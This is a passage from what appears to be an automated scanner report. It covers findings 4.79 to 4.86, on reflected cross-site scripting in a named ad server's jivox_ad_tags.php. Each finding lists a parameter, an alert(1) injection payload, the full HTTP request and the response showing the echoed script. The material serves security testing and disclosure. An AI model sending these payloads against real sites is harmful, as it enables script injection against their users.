
Remediation detail

Request

GET /player/jivox_ad_tags.php?t=1307962892856&r=0.9127810774371028&objectName=jvxAdPlayer&serverName=http://as.jivox.com&iframeTag=on&siteId=24bbcd13d37379&campaignId=19093&clickTagURL=http%3A%2F%2Fclicks.beap.ad.yieldmanager.net%2Fc%2FYnY9MS4wLjAmYnM9KDE0aWkxdWFxcShnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkNEhVSk9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMWN0cXVhczQpKQ%2F2%2F%2Ahttp%3A%2F%2Fwww.quatros.com&mouseAction=mouseOver&autoPlay=true&maxAds=3&pauseBetweenAds=1000&volume=0&volumeInitAction=toggleMute&restartOnUnmute=1&jivoxBranded=false&serverURL=http://as.jivox.com&reportingURL=http%3A%2F%2Fevs.jivox.com&adThumbnail=http://jivoxuploads.s3.amazonaws.com/15976/11955-vid-1284509745-4c901031d728a-b.jpg&adVideoURL=&78c54"-alert(1)-"6fea4a27bbd=1 HTTP/1.1
Host: as.jivox.com
Proxy-Connection: keep-alive
Referer: http://as.jivox.com/player/iabplayer.php?siteId=24bbcd13d37379&campaignId=19093&clickTagURL=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0aWkxdWFxcShnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkNEhVSk9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMWN0cXVhczQpKQ/2/*http://www.quatros.com&mouseAction=mouseOver
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Mon, 13 Jun 2011 11:04:09 GMT
Server: Apache/2.2.6 (Fedora)
Vary: Accept-Encoding,User-Agent
X-Powered-By: PHP/5.1.6
Content-Length: 57663
Connection: keep-alive

GLOBAL_IBUSTER_CONTAINER_ZINDEX = (typeof(GLOBAL_IBUSTER_CONTAINER_ZINDEX) == "undefined") ? 999999 : GLOBAL_IBUSTER_CONTAINER_ZINDEX + 1;
function jivoxAdPlayer(){
var clickThroughURL = "",

...[SNIP]...
e=1&jivoxBranded=false&serverURL=http://as.jivox.com&reportingURL=http%3A%2F%2Fevs.jivox.com&adThumbnail=http://jivoxuploads.s3.amazonaws.com/15976/11955-vid-1284509745-4c901031d728a-b.jpg&adVideoURL=&78c54"-alert(1)-"6fea4a27bbd=1&jvxSessionId=1307963049.2948");
jvxAdPlayer.setPlayerObjectId("jvxAdPlayer");
jvxAdPlayer.setPlayerObject(jvxAdPlayer);
jvxAdPlayer.render();
}

4.79. http://as.jivox.com/player/jivox_ad_tags.php [objectName parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://as.jivox.com
Path:	/player/jivox_ad_tags.php

Issue detail

The value of the objectName request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a375c'%3balert(1)//e99e5f54d4b was submitted in the objectName parameter. This input was echoed as a375c';alert(1)//e99e5f54d4b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /player/jivox_ad_tags.php?t=1307962892856&r=0.9127810774371028&objectName=jvxAdPlayera375c'%3balert(1)//e99e5f54d4b&serverName=http://as.jivox.com&iframeTag=on&siteId=24bbcd13d37379&campaignId=19093&clickTagURL=http%3A%2F%2Fclicks.beap.ad.yieldmanager.net%2Fc%2FYnY9MS4wLjAmYnM9KDE0aWkxdWFxcShnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkNEhVSk9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMWN0cXVhczQpKQ%2F2%2F%2Ahttp%3A%2F%2Fwww.quatros.com&mouseAction=mouseOver&autoPlay=true&maxAds=3&pauseBetweenAds=1000&volume=0&volumeInitAction=toggleMute&restartOnUnmute=1&jivoxBranded=false&serverURL=http://as.jivox.com&reportingURL=http%3A%2F%2Fevs.jivox.com&adThumbnail=http://jivoxuploads.s3.amazonaws.com/15976/11955-vid-1284509745-4c901031d728a-b.jpg&adVideoURL= HTTP/1.1
Host: as.jivox.com
Proxy-Connection: keep-alive
Referer: http://as.jivox.com/player/iabplayer.php?siteId=24bbcd13d37379&campaignId=19093&clickTagURL=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0aWkxdWFxcShnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkNEhVSk9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMWN0cXVhczQpKQ/2/*http://www.quatros.com&mouseAction=mouseOver
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Mon, 13 Jun 2011 11:02:41 GMT
Server: Apache/2.2.6 (Fedora)
Vary: Accept-Encoding,User-Agent
X-Powered-By: PHP/5.1.6
Content-Length: 57970
Connection: keep-alive

GLOBAL_IBUSTER_CONTAINER_ZINDEX = (typeof(GLOBAL_IBUSTER_CONTAINER_ZINDEX) == "undefined") ? 999999 : GLOBAL_IBUSTER_CONTAINER_ZINDEX + 1;
function jivoxAdPlayer(){
var clickThroughURL = "",

...[SNIP]...

var s = document.createElement('script');
s.type='text/javascript';
s.src= serverURL + '/jivox/serverAPIs/controlSettings.php?action=read&callback=jvxAdPlayera375c';alert(1)//e99e5f54d4b.returnControlSettingsCookie&name='+name+'&r='+jvxRandomNumber+'&t='+jvxTimeStamp.getTime();
document.getElementsByTagName('head')[0].appendChild(s);
},

...[SNIP]...

4.80. http://as.jivox.com/player/jivox_ad_tags.php [objectName parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://as.jivox.com
Path:	/player/jivox_ad_tags.php

Issue detail

The value of the objectName request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 96810"%3balert(1)//cac32923e7e was submitted in the objectName parameter. This input was echoed as 96810";alert(1)//cac32923e7e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /player/jivox_ad_tags.php?t=1307962892856&r=0.9127810774371028&objectName=jvxAdPlayer96810"%3balert(1)//cac32923e7e&serverName=http://as.jivox.com&iframeTag=on&siteId=24bbcd13d37379&campaignId=19093&clickTagURL=http%3A%2F%2Fclicks.beap.ad.yieldmanager.net%2Fc%2FYnY9MS4wLjAmYnM9KDE0aWkxdWFxcShnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkNEhVSk9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMWN0cXVhczQpKQ%2F2%2F%2Ahttp%3A%2F%2Fwww.quatros.com&mouseAction=mouseOver&autoPlay=true&maxAds=3&pauseBetweenAds=1000&volume=0&volumeInitAction=toggleMute&restartOnUnmute=1&jivoxBranded=false&serverURL=http://as.jivox.com&reportingURL=http%3A%2F%2Fevs.jivox.com&adThumbnail=http://jivoxuploads.s3.amazonaws.com/15976/11955-vid-1284509745-4c901031d728a-b.jpg&adVideoURL= HTTP/1.1
Host: as.jivox.com
Proxy-Connection: keep-alive
Referer: http://as.jivox.com/player/iabplayer.php?siteId=24bbcd13d37379&campaignId=19093&clickTagURL=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0aWkxdWFxcShnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkNEhVSk9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMWN0cXVhczQpKQ/2/*http://www.quatros.com&mouseAction=mouseOver
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Mon, 13 Jun 2011 11:02:38 GMT
Server: Apache/2.2.6 (Fedora)
Vary: Accept-Encoding,User-Agent
X-Powered-By: PHP/5.1.6
Content-Length: 57970
Connection: keep-alive

GLOBAL_IBUSTER_CONTAINER_ZINDEX = (typeof(GLOBAL_IBUSTER_CONTAINER_ZINDEX) == "undefined") ? 999999 : GLOBAL_IBUSTER_CONTAINER_ZINDEX + 1;
function jivoxAdPlayer(){
var clickThroughURL = "",

...[SNIP]...

render : generateJivoxPlayerTags

}
};

if(typeof(jivoxAdPlayer) != "undefined"){
var jvxAdPlayer96810";alert(1)//cac32923e7e = new jivoxAdPlayer();
jvxAdPlayer96810";alert(1)//cac32923e7e.setPlayerWidth(300);
jvxAdPlayer96810";alert(1)//cac32923e7e.setPlayerHeight(250);
jvxAdPlayer96810";alert(1)//cac32923e7e.setServerURL("http://as.jivox.com");
jvxAdPlayer96810";alert(
...[SNIP]...

4.81. http://as.jivox.com/player/jivox_ad_tags.php [objectName parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://as.jivox.com
Path:	/player/jivox_ad_tags.php

Issue detail

The value of the objectName request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 54bce%3balert(1)//6751049e87a was submitted in the objectName parameter. This input was echoed as 54bce;alert(1)//6751049e87a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /player/jivox_ad_tags.php?t=1307962892856&r=0.9127810774371028&objectName=jvxAdPlayer54bce%3balert(1)//6751049e87a&serverName=http://as.jivox.com&iframeTag=on&siteId=24bbcd13d37379&campaignId=19093&clickTagURL=http%3A%2F%2Fclicks.beap.ad.yieldmanager.net%2Fc%2FYnY9MS4wLjAmYnM9KDE0aWkxdWFxcShnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkNEhVSk9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMWN0cXVhczQpKQ%2F2%2F%2Ahttp%3A%2F%2Fwww.quatros.com&mouseAction=mouseOver&autoPlay=true&maxAds=3&pauseBetweenAds=1000&volume=0&volumeInitAction=toggleMute&restartOnUnmute=1&jivoxBranded=false&serverURL=http://as.jivox.com&reportingURL=http%3A%2F%2Fevs.jivox.com&adThumbnail=http://jivoxuploads.s3.amazonaws.com/15976/11955-vid-1284509745-4c901031d728a-b.jpg&adVideoURL= HTTP/1.1
Host: as.jivox.com
Proxy-Connection: keep-alive
Referer: http://as.jivox.com/player/iabplayer.php?siteId=24bbcd13d37379&campaignId=19093&clickTagURL=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0aWkxdWFxcShnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkNEhVSk9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMWN0cXVhczQpKQ/2/*http://www.quatros.com&mouseAction=mouseOver
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Mon, 13 Jun 2011 11:02:46 GMT
Server: Apache/2.2.6 (Fedora)
Vary: Accept-Encoding,User-Agent
X-Powered-By: PHP/5.1.6
Content-Length: 57958
Connection: keep-alive

GLOBAL_IBUSTER_CONTAINER_ZINDEX = (typeof(GLOBAL_IBUSTER_CONTAINER_ZINDEX) == "undefined") ? 999999 : GLOBAL_IBUSTER_CONTAINER_ZINDEX + 1;
function jivoxAdPlayer(){
var clickThroughURL = "",

...[SNIP]...
tivity,

retractOpenPanel : retractOpenPanel,

render : generateJivoxPlayerTags

}
};

if(typeof(jivoxAdPlayer) != "undefined"){
var jvxAdPlayer54bce;alert(1)//6751049e87a = new jivoxAdPlayer();
jvxAdPlayer54bce;alert(1)//6751049e87a.setPlayerWidth(300);
jvxAdPlayer54bce;alert(1)//6751049e87a.setPlayerHeight(250);
jvxAdPlayer54bce;alert(1)//6751049e87a.setSe
...[SNIP]...

4.82. http://as.jivox.com/player/jivox_ad_tags.php [pauseBetweenAds parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://as.jivox.com
Path:	/player/jivox_ad_tags.php

Issue detail

The value of the pauseBetweenAds request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8e16d"-alert(1)-"53b11bd0f73 was submitted in the pauseBetweenAds parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /player/jivox_ad_tags.php?t=1307962892856&r=0.9127810774371028&objectName=jvxAdPlayer&serverName=http://as.jivox.com&iframeTag=on&siteId=24bbcd13d37379&campaignId=19093&clickTagURL=http%3A%2F%2Fclicks.beap.ad.yieldmanager.net%2Fc%2FYnY9MS4wLjAmYnM9KDE0aWkxdWFxcShnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkNEhVSk9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMWN0cXVhczQpKQ%2F2%2F%2Ahttp%3A%2F%2Fwww.quatros.com&mouseAction=mouseOver&autoPlay=true&maxAds=3&pauseBetweenAds=10008e16d"-alert(1)-"53b11bd0f73&volume=0&volumeInitAction=toggleMute&restartOnUnmute=1&jivoxBranded=false&serverURL=http://as.jivox.com&reportingURL=http%3A%2F%2Fevs.jivox.com&adThumbnail=http://jivoxuploads.s3.amazonaws.com/15976/11955-vid-1284509745-4c901031d728a-b.jpg&adVideoURL= HTTP/1.1
Host: as.jivox.com
Proxy-Connection: keep-alive
Referer: http://as.jivox.com/player/iabplayer.php?siteId=24bbcd13d37379&campaignId=19093&clickTagURL=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0aWkxdWFxcShnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkNEhVSk9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMWN0cXVhczQpKQ/2/*http://www.quatros.com&mouseAction=mouseOver
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Mon, 13 Jun 2011 11:03:29 GMT
Server: Apache/2.2.6 (Fedora)
Vary: Accept-Encoding,User-Agent
X-Powered-By: PHP/5.1.6
Content-Length: 57660
Connection: keep-alive

GLOBAL_IBUSTER_CONTAINER_ZINDEX = (typeof(GLOBAL_IBUSTER_CONTAINER_ZINDEX) == "undefined") ? 999999 : GLOBAL_IBUSTER_CONTAINER_ZINDEX + 1;
function jivoxAdPlayer(){
var clickThroughURL = "",

...[SNIP]...
DEuMCxhaWQkNEhVSk9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMWN0cXVhczQpKQ%2F2%2F%2Ahttp%3A%2F%2Fwww.quatros.com&mouseAction=mouseOver&autoPlay=true&maxAds=3&pauseBetweenAds=10008e16d"-alert(1)-"53b11bd0f73&volume=0&volumeInitAction=toggleMute&restartOnUnmute=1&jivoxBranded=false&serverURL=http://as.jivox.com&reportingURL=http%3A%2F%2Fevs.jivox.com&adThumbnail=http://jivoxuploads.s3.amazonaws.com/15976/1
...[SNIP]...

4.83. http://as.jivox.com/player/jivox_ad_tags.php [r parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://as.jivox.com
Path:	/player/jivox_ad_tags.php

Issue detail

The value of the r request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 997ac"-alert(1)-"8b668abcb76 was submitted in the r parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /player/jivox_ad_tags.php?t=1307962892856&r=0.9127810774371028997ac"-alert(1)-"8b668abcb76&objectName=jvxAdPlayer&serverName=http://as.jivox.com&iframeTag=on&siteId=24bbcd13d37379&campaignId=19093&clickTagURL=http%3A%2F%2Fclicks.beap.ad.yieldmanager.net%2Fc%2FYnY9MS4wLjAmYnM9KDE0aWkxdWFxcShnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkNEhVSk9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMWN0cXVhczQpKQ%2F2%2F%2Ahttp%3A%2F%2Fwww.quatros.com&mouseAction=mouseOver&autoPlay=true&maxAds=3&pauseBetweenAds=1000&volume=0&volumeInitAction=toggleMute&restartOnUnmute=1&jivoxBranded=false&serverURL=http://as.jivox.com&reportingURL=http%3A%2F%2Fevs.jivox.com&adThumbnail=http://jivoxuploads.s3.amazonaws.com/15976/11955-vid-1284509745-4c901031d728a-b.jpg&adVideoURL= HTTP/1.1
Host: as.jivox.com
Proxy-Connection: keep-alive
Referer: http://as.jivox.com/player/iabplayer.php?siteId=24bbcd13d37379&campaignId=19093&clickTagURL=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0aWkxdWFxcShnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkNEhVSk9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMWN0cXVhczQpKQ/2/*http://www.quatros.com&mouseAction=mouseOver
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Mon, 13 Jun 2011 11:02:34 GMT
Server: Apache/2.2.6 (Fedora)
Vary: Accept-Encoding,User-Agent
X-Powered-By: PHP/5.1.6
Content-Length: 57660
Connection: keep-alive

GLOBAL_IBUSTER_CONTAINER_ZINDEX = (typeof(GLOBAL_IBUSTER_CONTAINER_ZINDEX) == "undefined") ? 999999 : GLOBAL_IBUSTER_CONTAINER_ZINDEX + 1;
function jivoxAdPlayer(){
var clickThroughURL = "",

...[SNIP]...
jvxAdPlayer.setPlayerWidth(300);
jvxAdPlayer.setPlayerHeight(250);
jvxAdPlayer.setServerURL("http://as.jivox.com");
jvxAdPlayer.setFlashVariables("t=1307962892856&r=0.9127810774371028997ac"-alert(1)-"8b668abcb76&objectName=jvxAdPlayer&serverName=http://as.jivox.com&iframeTag=on&siteId=24bbcd13d37379&campaignId=19093&clickTagURL=http%3A%2F%2Fclicks.beap.ad.yieldmanager.net%2Fc%2FYnY9MS4wLjAmYnM9KDE0aWkxdWFxcSh
...[SNIP]...

4.84. http://as.jivox.com/player/jivox_ad_tags.php [reportingURL parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://as.jivox.com
Path:	/player/jivox_ad_tags.php

Issue detail

The value of the reportingURL request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 235f6"-alert(1)-"1155aa007e6 was submitted in the reportingURL parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /player/jivox_ad_tags.php?t=1307962892856&r=0.9127810774371028&objectName=jvxAdPlayer&serverName=http://as.jivox.com&iframeTag=on&siteId=24bbcd13d37379&campaignId=19093&clickTagURL=http%3A%2F%2Fclicks.beap.ad.yieldmanager.net%2Fc%2FYnY9MS4wLjAmYnM9KDE0aWkxdWFxcShnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkNEhVSk9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMWN0cXVhczQpKQ%2F2%2F%2Ahttp%3A%2F%2Fwww.quatros.com&mouseAction=mouseOver&autoPlay=true&maxAds=3&pauseBetweenAds=1000&volume=0&volumeInitAction=toggleMute&restartOnUnmute=1&jivoxBranded=false&serverURL=http://as.jivox.com&reportingURL=http%3A%2F%2Fevs.jivox.com235f6"-alert(1)-"1155aa007e6&adThumbnail=http://jivoxuploads.s3.amazonaws.com/15976/11955-vid-1284509745-4c901031d728a-b.jpg&adVideoURL= HTTP/1.1
Host: as.jivox.com
Proxy-Connection: keep-alive
Referer: http://as.jivox.com/player/iabplayer.php?siteId=24bbcd13d37379&campaignId=19093&clickTagURL=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0aWkxdWFxcShnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkNEhVSk9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMWN0cXVhczQpKQ/2/*http://www.quatros.com&mouseAction=mouseOver
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Mon, 13 Jun 2011 11:03:54 GMT
Server: Apache/2.2.6 (Fedora)
Vary: Accept-Encoding,User-Agent
X-Powered-By: PHP/5.1.6
Content-Length: 57660
Connection: keep-alive

GLOBAL_IBUSTER_CONTAINER_ZINDEX = (typeof(GLOBAL_IBUSTER_CONTAINER_ZINDEX) == "undefined") ? 999999 : GLOBAL_IBUSTER_CONTAINER_ZINDEX + 1;
function jivoxAdPlayer(){
var clickThroughURL = "",

...[SNIP]...
ion=mouseOver&autoPlay=true&maxAds=3&pauseBetweenAds=1000&volume=0&volumeInitAction=toggleMute&restartOnUnmute=1&jivoxBranded=false&serverURL=http://as.jivox.com&reportingURL=http%3A%2F%2Fevs.jivox.com235f6"-alert(1)-"1155aa007e6&adThumbnail=http://jivoxuploads.s3.amazonaws.com/15976/11955-vid-1284509745-4c901031d728a-b.jpg&adVideoURL=&jvxSessionId=1307963034.6078");
jvxAdPlayer.setPlayerObjectId("jvxAdPlayer");
jvxAdP
...[SNIP]...

4.85. http://as.jivox.com/player/jivox_ad_tags.php [restartOnUnmute parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://as.jivox.com
Path:	/player/jivox_ad_tags.php

Issue detail

The value of the restartOnUnmute request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 40ae9"-alert(1)-"bfa34e952f0 was submitted in the restartOnUnmute parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /player/jivox_ad_tags.php?t=1307962892856&r=0.9127810774371028&objectName=jvxAdPlayer&serverName=http://as.jivox.com&iframeTag=on&siteId=24bbcd13d37379&campaignId=19093&clickTagURL=http%3A%2F%2Fclicks.beap.ad.yieldmanager.net%2Fc%2FYnY9MS4wLjAmYnM9KDE0aWkxdWFxcShnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkNEhVSk9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMWN0cXVhczQpKQ%2F2%2F%2Ahttp%3A%2F%2Fwww.quatros.com&mouseAction=mouseOver&autoPlay=true&maxAds=3&pauseBetweenAds=1000&volume=0&volumeInitAction=toggleMute&restartOnUnmute=140ae9"-alert(1)-"bfa34e952f0&jivoxBranded=false&serverURL=http://as.jivox.com&reportingURL=http%3A%2F%2Fevs.jivox.com&adThumbnail=http://jivoxuploads.s3.amazonaws.com/15976/11955-vid-1284509745-4c901031d728a-b.jpg&adVideoURL= HTTP/1.1
Host: as.jivox.com
Proxy-Connection: keep-alive
Referer: http://as.jivox.com/player/iabplayer.php?siteId=24bbcd13d37379&campaignId=19093&clickTagURL=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0aWkxdWFxcShnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkNEhVSk9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMWN0cXVhczQpKQ/2/*http://www.quatros.com&mouseAction=mouseOver
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Mon, 13 Jun 2011 11:03:41 GMT
Server: Apache/2.2.6 (Fedora)
Vary: Accept-Encoding,User-Agent
X-Powered-By: PHP/5.1.6
Content-Length: 57660
Connection: keep-alive

GLOBAL_IBUSTER_CONTAINER_ZINDEX = (typeof(GLOBAL_IBUSTER_CONTAINER_ZINDEX) == "undefined") ? 999999 : GLOBAL_IBUSTER_CONTAINER_ZINDEX + 1;
function jivoxAdPlayer(){
var clickThroughURL = "",

...[SNIP]...
REtONDZRSGlCazd3LHIkMCxyZCQxMWN0cXVhczQpKQ%2F2%2F%2Ahttp%3A%2F%2Fwww.quatros.com&mouseAction=mouseOver&autoPlay=true&maxAds=3&pauseBetweenAds=1000&volume=0&volumeInitAction=toggleMute&restartOnUnmute=140ae9"-alert(1)-"bfa34e952f0&jivoxBranded=false&serverURL=http://as.jivox.com&reportingURL=http%3A%2F%2Fevs.jivox.com&adThumbnail=http://jivoxuploads.s3.amazonaws.com/15976/11955-vid-1284509745-4c901031d728a-b.jpg&adVideoURL=&jvx
...[SNIP]...

4.86. http://as.jivox.com/player/jivox_ad_tags.php [serverName parameter] previous next

Summary

Severity:	High
Confidence:	Certain
